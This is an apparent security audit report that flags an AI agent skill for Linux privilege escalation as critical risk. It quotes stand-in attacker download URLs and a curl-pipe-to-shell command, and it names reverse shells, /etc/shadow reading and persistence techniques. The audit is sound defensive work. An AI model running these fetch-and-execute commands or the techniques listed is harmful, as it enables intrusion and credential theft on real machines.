Linux Privilege Escalation
Fail
Audited by Snyk on Feb 15, 2026
Risk Level: CRITICAL
Full Analysis
CRITICAL E005: Suspicious download URL detected in skill instructions.
- Suspicious download URL detected (high risk: 1.00). While GTFOBins and the cited GitHub projects are known legitimate resources, the list includes direct HTTP links to attacker-controlled hosts serving raw executables/scripts (e.g., http://ATTACKER_IP:8000/linpeas.sh and http://ATTACKER_IP/exploit.c), which are high-risk vectors for malware and unauthorized code execution.
CRITICAL E006: Malicious code pattern detected in skill scripts.
- Malicious code pattern detected (high risk: 1.00). This content is a high-risk offensive guide that directly instructs on privilege escalation, remote code execution (reverse shells), credential theft (reading /etc/shadow), persistence, and other system compromise techniques, and thus clearly enables malicious activity.
MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).
- Third-party content exposure detected (high risk: 1.00). The skill instructs the agent to download and execute tools and exploits from public/untrusted sources—e.g., curl/wget from GitHub (linpeas), links to GTFOBins and exploit-db/searchsploit, and arbitrary attacker-hosted URLs like http://ATTACKER_IP/exploit.c—so it clearly ingests untrusted third-party content as part of its workflow.
MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).
- Potentially malicious external URL detected (high risk: 1.00). The skill explicitly runs a runtime fetch-and-execute command (curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh) which downloads and executes remote code (linpeas.sh), so this URL is a runtime dependency that directly executes remote code.
MEDIUM W013: Attempt to modify system services in skill instructions.
- Attempt to modify system services in skill instructions detected (high risk: 1.00). This skill explicitly instructs enumeration and exploitation techniques to obtain root (compile/execute kernel exploits, create SUID binaries, modify /etc/passwd and cron scripts, add users, and launch reverse shells), which directs the agent to modify the machine's state and bypass security controls.